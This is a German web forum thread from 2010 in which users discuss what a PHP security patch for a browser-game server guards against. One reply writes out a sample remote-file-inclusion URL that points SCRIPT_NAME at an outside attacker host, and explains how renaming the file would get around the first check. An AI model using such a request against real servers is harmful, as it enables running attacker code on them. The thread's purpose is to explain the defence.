anpera.net

anpera.net

experimental server @home
Aktuelle Zeit: Mo 09 Jun, 2025 15:20

Alle Zeiten sind UTC + 1 Stunde




Ein neues Thema erstellen Auf das Thema antworten  [ 6 Beiträge ] 
Autor Nachricht
 Betreff des Beitrags: Frage zu einem Patch
BeitragVerfasst: Sa 16 Jan, 2010 16:43 
Offline
Profi
Profi

Registriert: Mo 30 Okt, 2006 21:29
Beiträge: 195
Ich wollte mal fragen was folgender Patch genau bewirkt:

$this->bbcode_second_pass_code('', '
if (substr($SCRIPT_NAME,strrpos($SCRIPT_NAME,".php"))!=".php" || strpos($PATH_INFO,".php")){
echo "Verarbeitung abgebrochen. Das Script ist ungueltig.";
')

Hier wird doch nur überprüft ob die angeforderte Datei die Endung .php hat. Ist dies nicht der Fall, würde doch weder die common.php eingebunden werden noch dieses codeschnippsel ausgeführt werden.


Nach oben
 Profil  
Mit Zitat antworten  
 Betreff des Beitrags: Re: Frage zu einem Patch
BeitragVerfasst: Sa 16 Jan, 2010 17:52 
Offline
Profi
Profi
Benutzeravatar

Registriert: Mo 02 Feb, 2009 21:11
Beiträge: 168
Geschlecht: Männlich
LoGD: salator.selfhost.de/lotgd
Ich vermute mal, dieser Code soll Seitenaufrufe wie diesen verhindern:
http://deinserver.de/source.php?SCRIPT_NAME=http://zombieserver.com/id.txt

Falls du deinen Server nun (bewusst oder fahrlässig) so konfiguriert hast, dass Code von extern ausgeführt werden kann, würde nun das ausgeführt werden was der Angreifer in id.txt geschrieben hat. Hier greift der erste Teil der Abfrage, der Scriptname endet nicht mehr mit .php

Nun könnte der Angreifer seine Datei umbenennen zu id.php
Jetzt greift der 2. Teil der Abfrage, im Pfadname, also vor dem letzten / kommt .php vor

In beiden Fällen würde "ungültiges Script" ausgegeben werden.

_________________
if(date("ymmd")=="10050502") echo("Der alte Sack wird heute 40");


Nach oben
 Profil  
Mit Zitat antworten  
 Betreff des Beitrags: Re: Frage zu einem Patch
BeitragVerfasst: Sa 16 Jan, 2010 18:18 
Offline
Freak
Freak
Benutzeravatar

Registriert: Sa 16 Jul, 2005 22:40
Beiträge: 693
Wohnort: /var/server/home/castle
Geschlecht: Männlich
LoGD: http://www.kokoto.de/
Skype: Apfelschokowodkakekskuchen
mmmhmm... War es nicht mal so gehandhabt worden das in diesem forum die "Bugfixes / Patches" nicht extra erklärt werden da es leute gibt, die es vlt ausnutzen falls es doch mal jemand nicht gemacht hat o.ä. ?

kann auch sein das ich mich irre >_>


Nach oben
 Profil  
Mit Zitat antworten  
 Betreff des Beitrags: Re: Frage zu einem Patch
BeitragVerfasst: Sa 16 Jan, 2010 18:24 
Offline
Profi
Profi

Registriert: Mo 30 Okt, 2006 21:29
Beiträge: 195
Zitat:


Das funktioniert? Gibts dazu ne Doku? Find nämlich nix ^^


Nach oben
 Profil  
Mit Zitat antworten  
 Betreff des Beitrags: Re: Frage zu einem Patch
BeitragVerfasst: Sa 16 Jan, 2010 18:37 
Offline
Freak
Freak
Benutzeravatar

Registriert: Sa 28 Aug, 2004 18:48
Beiträge: 1712
Tidus hat geschrieben:
mmmhmm... War es nicht mal so gehandhabt worden das in diesem forum die "Bugfixes / Patches" nicht extra erklärt werden da es leute gibt, die es vlt ausnutzen falls es doch mal jemand nicht gemacht hat o.ä. ?

kann auch sein das ich mich irre >_>


ist so, daher werden sicherheitsfixe auch nur gepostet und anpera über die Hintergründe informiert :)

_________________
~Inaktiv und Abwesend solange Mysql hier Moderatorenrechte hat~


Nach oben
 Profil  
Mit Zitat antworten  
 Betreff des Beitrags: Re: Frage zu einem Patch
BeitragVerfasst: Sa 16 Jan, 2010 18:43 
Offline
Freak
Freak
Benutzeravatar

Registriert: Sa 16 Jul, 2005 22:40
Beiträge: 693
Wohnort: /var/server/home/castle
Geschlecht: Männlich
LoGD: http://www.kokoto.de/
Skype: Apfelschokowodkakekskuchen
Gut dann bin ich ja doch noch nicht Senil >_>


Nach oben
 Profil  
Mit Zitat antworten  
Beiträge der letzten Zeit anzeigen:  Sortiere nach  
Ein neues Thema erstellen Auf das Thema antworten  [ 6 Beiträge ] 

Alle Zeiten sind UTC + 1 Stunde


Wer ist online?

Mitglieder in diesem Forum: 0 Mitglieder und 18 Gäste


Du darfst keine neuen Themen in diesem Forum erstellen
Du darfst keine Antworten zu Themen in diesem Forum erstellen
Du darfst deine Beiträge in diesem Forum nicht ändern
Du darfst deine Beiträge in diesem Forum nicht löschen
Du darfst keine Dateianhänge in diesem Forum erstellen

Suche nach:
Gehe zu:  
POWERED_BY
Deutsche Übersetzung durch phpBB.de
anpera.net - Impressum